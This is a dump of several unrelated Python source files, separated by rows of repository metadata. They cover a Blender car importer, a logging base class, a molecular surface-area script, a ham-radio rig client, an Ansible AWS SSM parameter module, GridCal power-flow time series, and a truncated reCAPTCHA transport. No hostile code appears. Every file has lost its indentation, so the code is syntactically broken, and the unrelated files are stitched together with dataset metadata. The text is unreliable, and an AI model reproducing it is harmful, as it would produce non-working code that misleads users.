from mathutils import Vector
from . import common
from . import carinfo
from . import prm_in
from .common import *
def import_file(filepath, scene):
"""
Imports a parameters.txt file and loads car body and wheels.
"""
PARAMETERS[filepath] = carinfo.read_parameters(filepath)
# Imports the car with all supported files
import_car(scene, PARAMETERS[filepath], filepath)
# Removes parameters from dict so they can be reloaded next time
PARAMETERS.pop(filepath)
def import_car(scene, params, filepath):
body = params["model"][params["body"]["modelnum"]]
body_loc = to_blender_coord(params["body"]["offset"])
wheel0loc = to_blender_coord(params["wheel"][0]["offset1"])
wheel1loc = to_blender_coord(params["wheel"][1]["offset1"])
wheel2loc = to_blender_coord(params["wheel"][2]["offset1"])
wheel3loc = to_blender_coord(params["wheel"][3]["offset1"])
folder = os.sep.join(filepath.split(os.sep)[:-1])
# Checks if the wheel models exist
wheel0_modelnum = int(params["wheel"][0]["modelnum"])
if wheel0_modelnum >= 0:
wheel0 = params["model"][wheel0_modelnum]
if wheel0.split(os.sep)[-1] in os.listdir(folder):
wheel0path = os.sep.join([folder, wheel0.split(os.sep)[-1]])
else:
wheel0 = None
wheel1_modelnum = int(params["wheel"][1]["modelnum"])
if wheel1_modelnum >= 0:
wheel1 = params["model"][wheel1_modelnum]
if wheel1.split(os.sep)[-1] in os.listdir(folder):
wheel1path = os.sep.join([folder, wheel1.split(os.sep)[-1]])
else:
wheel1 = None
wheel2_modelnum = int(params["wheel"][2]["modelnum"])
if wheel2_modelnum >= 0:
wheel2 = params["model"][wheel2_modelnum]
if wheel2.split(os.sep)[-1] in os.listdir(folder):
wheel2path = os.sep.join([folder, wheel2.split(os.sep)[-1]])
else:
wheel2 = None
wheel3_modelnum = int(params["wheel"][3]["modelnum"])
if wheel3_modelnum >= 0:
wheel3 = params["model"][wheel3_modelnum]
if wheel3.split(os.sep)[-1] in os.listdir(folder):
wheel3path = os.sep.join([folder, wheel3.split(os.sep)[-1]])
else:
wheel3 = None
# Checks if the body is in the same folder
if body.split(os.sep)[-1] in os.listdir(folder):
bodypath = os.sep.join([folder, body.split(os.sep)[-1]])
# Creates the car body and sets the offset
body_obj = prm_in.import_file(bodypath, scene)
body_obj.location = body_loc
# Creates the wheel objects or an empty if the wheel file is not present
if wheel0:
wheel = prm_in.import_file(wheel0path, scene)
else:
wheel = bpy.data.objects.new("wheel 0", None)
scene.objects.link(wheel)
wheel.empty_draw_type = "SPHERE"
wheel.empty_draw_size = 0.1
wheel.location = wheel0loc
wheel.parent = body_obj
if wheel1:
wheel = prm_in.import_file(wheel1path, scene)
else:
wheel = bpy.data.objects.new("wheel 1", None)
scene.objects.link(wheel)
wheel.empty_draw_type = "SPHERE"
wheel.empty_draw_size = 0.1
wheel.location = wheel1loc
wheel.parent = body_obj
if wheel2:
wheel = prm_in.import_file(wheel2path, scene)
else:
wheel = bpy.data.objects.new("wheel 2", None)
scene.objects.link(wheel)
wheel.empty_draw_type = "SPHERE"
wheel.empty_draw_size = 0.1
wheel.location = wheel2loc
wheel.parent = body_obj
if wheel3:
wheel = prm_in.import_file(wheel3path, scene)
else:
wheel = bpy.data.objects.new("wheel 3", None)
scene.objects.link(wheel)
wheel.empty_draw_type = "SPHERE"
wheel.empty_draw_size = 0.1
wheel.location = wheel3loc
wheel.parent = body_obj
# Aerial representation
aerial_loc = to_blender_coord(params["aerial"]["offset"])
aerial = bpy.data.objects.new( "aerial", None )
scene.objects.link(aerial)
aerial.location = aerial_loc
aerial.empty_draw_size = 0.1
aerial.empty_draw_type = 'PLAIN_AXES'
aerial.parent = body_obj
| gpl-3.0 | 5,301,716,076,450,188,000 | 30.390071 | 76 | 0.611999 | false |
wolcomm/rptk | rptk/base.py | 1 | 3743 | # Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk base module."""
from __future__ import print_function
from __future__ import unicode_literals
import inspect
import logging
class BaseObject(object):
"""BaseObject class providing generic logging functionality."""
def __init__(self):
"""Initialise object."""
self._log = logging.getLogger(self.__module__)
def __repr__(self):
"""Provide generic string representation."""
return "{}() object".format(self.cls_name)
def __enter__(self):
"""Log context manager entry."""
self.log_ready_start()
self.log_ready_done()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Log context manager exit."""
self.log_exit_start()
self.log_exit_done()
@property
def opts(self):
"""Get self.opts if it exists."""
return getattr(self, "_opts", None)
@property
def log(self):
"""Get the current logger."""
return self._log
@property
def cls_name(self):
"""Get the class name of self."""
return self.__class__.__name__
@property
def current_method(self):
"""Get the currently executing method name."""
return inspect.currentframe().f_back.f_code.co_name
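# Added note: the f_back hop resolves to the caller's frame, so this property is
# meant to be read from inside the method whose name is wanted, e.g.
#   self.log_method_enter(method=self.current_method)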
def log_init(self):
"""Log entry into the __init__ method."""
self.log.debug(msg="initialising {} instance".format(self.cls_name))
def log_init_done(self):
"""Log exit from an __init__ method."""
caller = inspect.currentframe().f_back.f_back.f_code.co_name
if caller == '__init__':
self.log.debug(msg="still initialising {} instance"
.format(self.cls_name))
else:
self.log.debug(msg="{} instance initialised".format(self.cls_name))
def log_method_enter(self, method=None):
"""Log entry into a class method."""
self.log.debug(msg="entering method {}.{}"
.format(self.cls_name, method))
def log_method_exit(self, method=None):
"""Log exit from a class method."""
self.log.debug(msg="leaving method {}.{}"
.format(self.cls_name, method))
def log_ready_start(self):
"""Log start of object initialisation."""
self.log.debug(msg="preparing {} for use".format(self))
def log_ready_done(self):
"""Log end of object initialisation."""
self.log.debug(msg="{} ready for use".format(self))
def log_exit_start(self):
"""Log start of object cleanup."""
self.log.debug(msg="cleaning up {}".format(self))
def log_exit_done(self):
"""Log end of object cleanup."""
self.log.debug(msg="finished cleaning up {}".format(self))
def raise_type_error(self, arg=None, cls=None):
"""Raise a TypeError with useful logging."""
msg = "argument {} ({}) not of type {}".format(arg.__name__, arg, cls)
self.log.error(msg=msg)
raise TypeError(msg)
def raise_runtime_error(self, msg=None):
"""Raise a RuntimeError with useful logging."""
self.log.error(msg=msg)
raise RuntimeError(msg)
| apache-2.0 | 8,040,617,203,420,518,000 | 32.720721 | 79 | 0.606733 | false |
platinhom/DailyTools | scripts/ESES_ElementArea.py | 1 | 3679 | #! /usr/bin/env python
# -*- coding: utf8 -*-
# Author: Platinhom; Last Updated: 2015-09-10
# Calculate each element surface area by MS_Intersection and also match the atomic area results to the pqr file.
# Usage: python ESES_ElementArea.py file.pqr
#
# Need: MS_Intersection (partition version)
# Note: Only for PQR format input.
# Custom: ESES parameters.
import os,sys
# Modify the ESES program parameter here.
# You can modify to command line input parameter as you like
probe=1.4
grid=0.2
buffer=4.0
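# Note (added commentary, not in the original script): these three values are
# passed straight through to the MS_Intersection command line built below; probe
# is presumably the solvent probe radius in Angstrom (1.4 is the conventional
# water probe), grid the mesh spacing and buffer the bounding-box margin, but the
# exact interpretation is defined by the external ESES binary.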
if (__name__ == '__main__'):
fname=sys.argv[1]
fnamelist=os.path.splitext(fname)
fxyzr=open(fnamelist[0]+".xyzr",'w')
fr=open(fname)
inlines=fr.readlines();
fr.close();
# All elements/types of input atoms, used in element area summary.
atomtypes=[];
# Write out the corresponding xyzr file.
for line in inlines:
# Each atom
if (line[:4]=="ATOM" or line[:6]=="HETATM"):
# Atom element here
tmp=line.split();
element=tmp[-1].upper();
atomtypes.append(element);
# Extract x, y, z, r from pqr to xyzr file
radius="%10.5f" % float(line[62:70].strip());
xcoor="%10.5f" % float(line[30:38].strip());
ycoor="%10.5f" % float(line[38:46].strip());
zcoor="%10.5f" % float(line[46:54].strip());
xyzrstr=xcoor+ycoor+zcoor+radius+"\n";
fxyzr.write(xyzrstr);
fxyzr.close()
# Use external ESES program to generate surface and calculate atom area
## So you have to put the ESES program in the same directory
# Output a "partition_area.txt" file saving atom area
#os.system('./MS_Intersection_Area '+fnamelist[0]+".xyzr "+str(probe)+" "+str(grid)+" "+str(buffer));
p=os.popen('./MS_Intersection '+fnamelist[0]+".xyzr "+str(probe)+" "+str(grid)+" "+str(buffer),'r')
totalArea="0"
totalVolume="0"
while 1:
line=p.readline();
if "area:" in line: totalArea=line.split(':')[1].split()[0]
if "volume:" in line: totalVolume=line.split(':')[1].split()[0]
if not line:break
# Analyze output atom area file
fa=open("partition_area.txt")
atomareas=[];# tmp save atom area by atom number
typedefault=["H","C","N","O","F","S","P","CL","BR","I"];
typeareas={"H":0.0,"C":0.0,"N":0.0,"O":0.0,"F":0.0,"S":0.0,"P":0.0,"CL":0.0,"BR":0.0,"I":0.0};
atomnum=0;
for line in fa:
tmp=line.split();
atomarea="%12.6f" % float(tmp[1]);
atomareas.append(atomarea);
atype=atomtypes[atomnum];
typeareas[atype]=typeareas.setdefault(atype,0.0)+float(tmp[1]);
atomnum=atomnum+1;
fa.close()
# Write out pqra file saving atom area
fwname=fnamelist[0]+"_area.pqra"
fw=open(fwname,'w')
# Write the total area for each element.
## Notice that here just write out the default elements.
## If you want all elements, use "typeused" for iteration.
typeused=["H","C","N","O","F","S","P","CL","BR","I"];
for i in typeareas.iterkeys():
if i not in typeused:typeused.append(i);
# For print out the atom area summary
outputelearea=fnamelist[0]+" Areas: "+totalArea+" Volumes: "+totalVolume+" ";
fw.write("REMARK AREAS "+totalArea+"\n");
fw.write("REMARK VOLUMES "+totalVolume+"\n");
for element in typedefault:
# If you want all elements, need to comment the above line and uncomment the following line.
#for element in typeused:
fw.write("REMARK AREA "+"%2s"%element+" "+"%20.6f"%typeareas.get(element,0.0)+"\n");
outputelearea=outputelearea+element+": "+str(typeareas[element])+" ";
print outputelearea
fr=open(fname)
atomnum=0;
for line in fr:
if (line[:4]=="ATOM" or line[:6]=="HETATM"):
tmp=line.split();
element=tmp[-1].upper();
newline=line.strip('\n')+atomareas[atomnum]+"\n";
fw.write(newline);
atomnum=atomnum+1;
else:
fw.write(line);
fr.close();
fw.close()
#end main
| gpl-2.0 | -1,598,104,058,107,988,000 | 32.144144 | 112 | 0.65969 | false |
ea4gja/mrig | mrig/mrig.py | 1 | 1349 | #!/usr/bin/env python
#
# File: mrig.py
# Version: 1.0
#
# mrig: main program
# Copyright (c) 2016 German EA4GJA
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
from mrig_config import *
from gui_tkinter import *
import sys
import socket
import os
from Tkinter import Tk
import multiprocessing
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
tcp.connect((REMOTE_SERVER, REMOTE_SERVER_TCP_PORT))
tcp.setblocking(1)
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(("", LOCAL_UDP_PORT))
udp.setblocking(0)
root = Tk()
gui = gui_Tkinter(root, tcp=tcp, udp=udp)
root.mainloop()
tcp.close()
udp.close()
| gpl-2.0 | -2,723,161,411,879,875,600 | 27.104167 | 67 | 0.749444 | false |
Lujeni/ansible | lib/ansible/modules/cloud/amazon/aws_ssm_parameter_store.py | 1 | 7817 | #!/usr/bin/python
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: aws_ssm_parameter_store
short_description: Manage key-value pairs in aws parameter store.
description:
- Manage key-value pairs in aws parameter store.
version_added: "2.5"
options:
name:
description:
- Parameter key name.
required: true
type: str
description:
description:
- Parameter key description.
required: false
type: str
value:
description:
- Parameter value.
required: false
type: str
state:
description:
- Creates or modifies an existing parameter.
- Deletes a parameter.
required: false
choices: ['present', 'absent']
default: present
type: str
string_type:
description:
- Parameter String type.
required: false
choices: ['String', 'StringList', 'SecureString']
default: String
type: str
decryption:
description:
- Work with SecureString type to get plain text secrets
type: bool
required: false
default: true
key_id:
description:
- AWS KMS key to decrypt the secrets.
- The default key (C(alias/aws/ssm)) is automatically generated the first
time it's requested.
required: false
default: alias/aws/ssm
type: str
overwrite_value:
description:
- Option to overwrite an existing value if it already exists.
required: false
version_added: "2.6"
choices: ['never', 'changed', 'always']
default: changed
type: str
author:
- Nathan Webster (@nathanwebsterdotme)
- Bill Wang (@ozbillwang) <[email protected]>
- Michael De La Rue (@mikedlr)
extends_documentation_fragment:
- aws
- ec2
requirements: [ botocore, boto3 ]
'''
EXAMPLES = '''
- name: Create or update key/value pair in aws parameter store
aws_ssm_parameter_store:
name: "Hello"
description: "This is your first key"
value: "World"
- name: Delete the key
aws_ssm_parameter_store:
name: "Hello"
state: absent
- name: Create or update secure key/value pair with default kms key (aws/ssm)
aws_ssm_parameter_store:
name: "Hello"
description: "This is your first key"
string_type: "SecureString"
value: "World"
- name: Create or update secure key/value pair with nominated kms key
aws_ssm_parameter_store:
name: "Hello"
description: "This is your first key"
string_type: "SecureString"
key_id: "alias/demo"
value: "World"
- name: Always update a parameter store value and create a new version
aws_ssm_parameter_store:
name: "overwrite_example"
description: "This example will always overwrite the value"
string_type: "String"
value: "Test1234"
overwrite_value: "always"
- name: recommend to use with aws_ssm lookup plugin
debug: msg="{{ lookup('aws_ssm', 'hello') }}"
'''
RETURN = '''
put_parameter:
description: Add one or more parameters to the system.
returned: success
type: dict
delete_parameter:
description: Delete a parameter from the system.
returned: success
type: dict
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import boto3_conn, get_aws_connection_info
try:
from botocore.exceptions import ClientError
except ImportError:
pass # will be captured by imported HAS_BOTO3
def update_parameter(client, module, args):
changed = False
response = {}
try:
response = client.put_parameter(**args)
changed = True
except ClientError as e:
module.fail_json_aws(e, msg="setting parameter")
return changed, response
def create_update_parameter(client, module):
changed = False
existing_parameter = None
response = {}
args = dict(
Name=module.params.get('name'),
Value=module.params.get('value'),
Type=module.params.get('string_type')
)
if (module.params.get('overwrite_value') in ("always", "changed")):
args.update(Overwrite=True)
else:
args.update(Overwrite=False)
if module.params.get('description'):
args.update(Description=module.params.get('description'))
if module.params.get('string_type') == 'SecureString':
args.update(KeyId=module.params.get('key_id'))
try:
existing_parameter = client.get_parameter(Name=args['Name'], WithDecryption=True)
except Exception:
pass
if existing_parameter:
if (module.params.get('overwrite_value') == 'always'):
(changed, response) = update_parameter(client, module, args)
elif (module.params.get('overwrite_value') == 'changed'):
if existing_parameter['Parameter']['Type'] != args['Type']:
(changed, response) = update_parameter(client, module, args)
if existing_parameter['Parameter']['Value'] != args['Value']:
(changed, response) = update_parameter(client, module, args)
if args.get('Description'):
# Description field not available from get_parameter function so get it from describe_parameters
describe_existing_parameter = None
try:
describe_existing_parameter_paginator = client.get_paginator('describe_parameters')
describe_existing_parameter = describe_existing_parameter_paginator.paginate(
Filters=[{"Key": "Name", "Values": [args['Name']]}]).build_full_result()
except ClientError as e:
module.fail_json_aws(e, msg="getting description value")
if describe_existing_parameter['Parameters'][0]['Description'] != args['Description']:
(changed, response) = update_parameter(client, module, args)
else:
(changed, response) = update_parameter(client, module, args)
return changed, response
def delete_parameter(client, module):
response = {}
try:
response = client.delete_parameter(
Name=module.params.get('name')
)
except ClientError as e:
if e.response['Error']['Code'] == 'ParameterNotFound':
return False, {}
module.fail_json_aws(e, msg="deleting parameter")
return True, response
def setup_client(module):
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
connection = boto3_conn(module, conn_type='client', resource='ssm', region=region, endpoint=ec2_url, **aws_connect_params)
return connection
def setup_module_object():
argument_spec = dict(
name=dict(required=True),
description=dict(),
value=dict(required=False, no_log=True),
state=dict(default='present', choices=['present', 'absent']),
string_type=dict(default='String', choices=['String', 'StringList', 'SecureString']),
decryption=dict(default=True, type='bool'),
key_id=dict(default="alias/aws/ssm"),
overwrite_value=dict(default='changed', choices=['never', 'changed', 'always']),
)
return AnsibleAWSModule(
argument_spec=argument_spec,
)
def main():
module = setup_module_object()
state = module.params.get('state')
client = setup_client(module)
invocations = {
"present": create_update_parameter,
"absent": delete_parameter,
}
(changed, response) = invocations[state](client, module)
module.exit_json(changed=changed, response=response)
if __name__ == '__main__':
main()
| gpl-3.0 | 6,053,639,846,693,307,000 | 28.609848 | 126 | 0.643214 | false |
SanPen/GridCal | src/GridCal/Engine/Simulations/LinearFactors/linear_analysis_ts_driver.py | 1 | 10126 | # This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import json
import pandas as pd
import numpy as np
import scipy.sparse as sp
from scipy.sparse.linalg import spsolve, factorized
import time
from GridCal.Engine.Simulations.result_types import ResultTypes
from GridCal.Engine.Core.multi_circuit import MultiCircuit
from GridCal.Engine.Simulations.PowerFlow.power_flow_options import PowerFlowOptions
from GridCal.Engine.Simulations.LinearFactors.linear_analysis import LinearAnalysis
from GridCal.Engine.Simulations.LinearFactors.linear_analysis_driver import LinearAnalysisOptions
from GridCal.Engine.Simulations.results_model import ResultsModel
from GridCal.Engine.Core.time_series_pf_data import compile_time_circuit
from GridCal.Engine.Simulations.driver_types import SimulationTypes
from GridCal.Engine.Simulations.results_template import ResultsTemplate
from GridCal.Engine.Simulations.driver_template import TSDriverTemplate
class LinearAnalysisTimeSeriesResults(ResultsTemplate):
def __init__(self, n, m, time_array, bus_names, bus_types, branch_names):
"""
TimeSeriesResults constructor
@param n: number of buses
@param m: number of branches
@param nt: number of time steps
"""
ResultsTemplate.__init__(self,
name='Linear Analysis time series',
available_results=[ResultTypes.BusActivePower,
ResultTypes.BranchActivePowerFrom,
ResultTypes.BranchLoading
],
data_variables=['bus_names',
'bus_types',
'time',
'branch_names',
'voltage',
'S',
'Sf',
'loading',
'losses'])
self.nt = len(time_array)
self.m = m
self.n = n
self.time = time_array
self.bus_names = bus_names
self.bus_types = bus_types
self.branch_names = branch_names
self.voltage = np.ones((self.nt, n), dtype=float)
self.S = np.zeros((self.nt, n), dtype=float)
self.Sf = np.zeros((self.nt, m), dtype=float)
self.loading = np.zeros((self.nt, m), dtype=float)
self.losses = np.zeros((self.nt, m), dtype=float)
def apply_new_time_series_rates(self, nc: "TimeCircuit"):
rates = nc.Rates.T
self.loading = self.Sf / (rates + 1e-9)
def get_results_dict(self):
"""
Returns a dictionary with the results sorted in a dictionary
:return: dictionary of 2D numpy arrays (probably of complex numbers)
"""
data = {'V': self.voltage.tolist(),
'P': self.S.real.tolist(),
'Q': self.S.imag.tolist(),
'Sbr_real': self.Sf.real.tolist(),
'Sbr_imag': self.Sf.imag.tolist(),
'loading': np.abs(self.loading).tolist()}
return data
def mdl(self, result_type: ResultTypes) -> "ResultsModel":
"""
Get ResultsModel instance
:param result_type:
:return: ResultsModel instance
"""
if result_type == ResultTypes.BusActivePower:
labels = self.bus_names
data = self.S
y_label = '(MW)'
title = 'Bus active power '
elif result_type == ResultTypes.BranchActivePowerFrom:
labels = self.branch_names
data = self.Sf.real
y_label = '(MW)'
title = 'Branch power '
elif result_type == ResultTypes.BranchLoading:
labels = self.branch_names
data = self.loading * 100
y_label = '(%)'
title = 'Branch loading '
elif result_type == ResultTypes.BranchLosses:
labels = self.branch_names
data = self.losses
y_label = '(MVA)'
title = 'Branch losses'
elif result_type == ResultTypes.BusVoltageModule:
labels = self.bus_names
data = self.voltage
y_label = '(p.u.)'
title = 'Bus voltage'
else:
raise Exception('Result type not understood:' + str(result_type))
if self.time is not None:
index = self.time
else:
index = list(range(data.shape[0]))
# assemble model
return ResultsModel(data=data, index=index, columns=labels, title=title, ylabel=y_label, units=y_label)
class LinearAnalysisTimeSeries(TSDriverTemplate):
name = 'Linear analysis time series'
tpe = SimulationTypes.LinearAnalysis_TS_run
def __init__(self, grid: MultiCircuit, options: LinearAnalysisOptions, start_=0, end_=None):
"""
TimeSeries constructor
@param grid: MultiCircuit instance
@param options: LinearAnalysisOptions instance
"""
TSDriverTemplate.__init__(self, grid=grid, start_=start_, end_=end_)
self.options = options
self.results = LinearAnalysisTimeSeriesResults(n=0,
m=0,
time_array=[],
bus_names=[],
bus_types=[],
branch_names=[])
self.ptdf_driver = LinearAnalysis(grid=self.grid, distributed_slack=self.options.distribute_slack)
def get_steps(self):
"""
Get time steps list of strings
"""
return [l.strftime('%d-%m-%Y %H:%M') for l in self.indices]
def run(self):
"""
Run the time series simulation
@return:
"""
self.__cancel__ = False
a = time.time()
if self.end_ is None:
self.end_ = len(self.grid.time_profile)
time_indices = np.arange(self.start_, self.end_ + 1)
ts_numeric_circuit = compile_time_circuit(self.grid)
self.results = LinearAnalysisTimeSeriesResults(n=ts_numeric_circuit.nbus,
m=ts_numeric_circuit.nbr,
time_array=ts_numeric_circuit.time_array[time_indices],
bus_names=ts_numeric_circuit.bus_names,
bus_types=ts_numeric_circuit.bus_types,
branch_names=ts_numeric_circuit.branch_names)
self.indices = pd.to_datetime(ts_numeric_circuit.time_array[time_indices])
self.progress_text.emit('Computing PTDF...')
linear_analysis = LinearAnalysis(grid=self.grid,
distributed_slack=self.options.distribute_slack,
correct_values=self.options.correct_values
)
linear_analysis.run()
self.progress_text.emit('Computing branch flows...')
Pbus_0 = ts_numeric_circuit.Sbus.real[:, time_indices]
self.results.Sf = linear_analysis.get_flows_time_series(Pbus_0)
# compute post process
self.results.loading = self.results.Sf / (ts_numeric_circuit.Rates[:, time_indices].T + 1e-9)
self.results.S = Pbus_0.T
self.elapsed = time.time() - a
# send the finnish signal
self.progress_signal.emit(0.0)
self.progress_text.emit('Done!')
self.done_signal.emit()
if __name__ == '__main__':
from matplotlib import pyplot as plt
from GridCal.Engine import *
fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/IEEE39_1W.gridcal'
# fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/grid_2_islands.xlsx'
# fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/1354 Pegase.xlsx'
main_circuit = FileOpen(fname).open()
options_ = LinearAnalysisOptions()
ptdf_driver = LinearAnalysisTimeSeries(grid=main_circuit, options=options_)
ptdf_driver.run()
pf_options_ = PowerFlowOptions(solver_type=SolverType.NR)
ts_driver = TimeSeries(grid=main_circuit, options=pf_options_)
ts_driver.run()
fig = plt.figure()
ax1 = fig.add_subplot(221)
ax1.set_title('Newton-Raphson based flow')
ax1.plot(ts_driver.results.Sf.real)
ax2 = fig.add_subplot(222)
ax2.set_title('PTDF based flow')
ax2.plot(ptdf_driver.results.Sf.real)
ax3 = fig.add_subplot(223)
ax3.set_title('Difference')
diff = ts_driver.results.Sf.real - ptdf_driver.results.Sf.real
ax3.plot(diff)
fig2 = plt.figure()
ax1 = fig2.add_subplot(221)
ax1.set_title('Newton-Raphson based voltage')
ax1.plot(np.abs(ts_driver.results.voltage))
ax2 = fig2.add_subplot(222)
ax2.set_title('PTDF based voltage')
ax2.plot(ptdf_driver.results.voltage)
ax3 = fig2.add_subplot(223)
ax3.set_title('Difference')
diff = np.abs(ts_driver.results.voltage) - ptdf_driver.results.voltage
ax3.plot(diff)
plt.show()
| gpl-3.0 | -3,750,878,709,547,375,600 | 36.783582 | 111 | 0.567351 | false |
googleapis/googleapis-gen | google/cloud/recaptchaenterprise/v1beta1/recaptchaenterprise-v1beta1-py/google/cloud/recaptchaenterprise_v1beta1/services/recaptcha_enterprise_service_v1_beta1/transports/base.py | 1 | 9862 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.recaptchaenterprise_v1beta1.types import recaptchaenterprise
from google.protobuf import empty_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
'google-cloud-recaptchaenterprise',
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class RecaptchaEnterpriseServiceV1Beta1Transport(abc.ABC):
"""Abstract transport class for RecaptchaEnterpriseServiceV1Beta1."""
AUTH_SCOPES = (
'https://www.googleapis.com/auth/cloud-platform',
)
DEFAULT_HOST: str = 'recaptchaenterprise.googleapis.com'
def __init__(
self, *,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ':' not in host:
host += ':443'
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs("'credentials_file' and 'credentials' are mutually exclusive")
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file,
**scopes_kwargs,
quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(**scopes_kwargs, quota_project_id=quota_project_id)
# If the credentials is service account credentials, then always try to use self signed JWT.
if always_use_jwt_access and isinstance(credentials, service_account.Credentials) and hasattr(service_account.Credentials, "with_always_use_jwt_access"):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(cls, host: str, scopes: Optional[Sequence[str]]) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.create_assessment: gapic_v1.method.wrap_method(
self.create_assessment,
default_timeout=600.0,
client_info=client_info,
),
self.annotate_assessment: gapic_v1.method.wrap_method(
self.annotate_assessment,
default_timeout=600.0,
client_info=client_info,
),
self.create_key: gapic_v1.method.wrap_method(
self.create_key,
default_timeout=600.0,
client_info=client_info,
),
self.list_keys: gapic_v1.method.wrap_method(
self.list_keys,
default_timeout=600.0,
client_info=client_info,
),
self.get_key: gapic_v1.method.wrap_method(
self.get_key,
default_timeout=600.0,
client_info=client_info,
),
self.update_key: gapic_v1.method.wrap_method(
self.update_key,
default_timeout=600.0,
client_info=client_info,
),
self.delete_key: gapic_v1.method.wrap_method(
self.delete_key,
default_timeout=600.0,
client_info=client_info,
),
}
@property
def create_assessment(self) -> Callable[
[recaptchaenterprise.CreateAssessmentRequest],
Union[
recaptchaenterprise.Assessment,
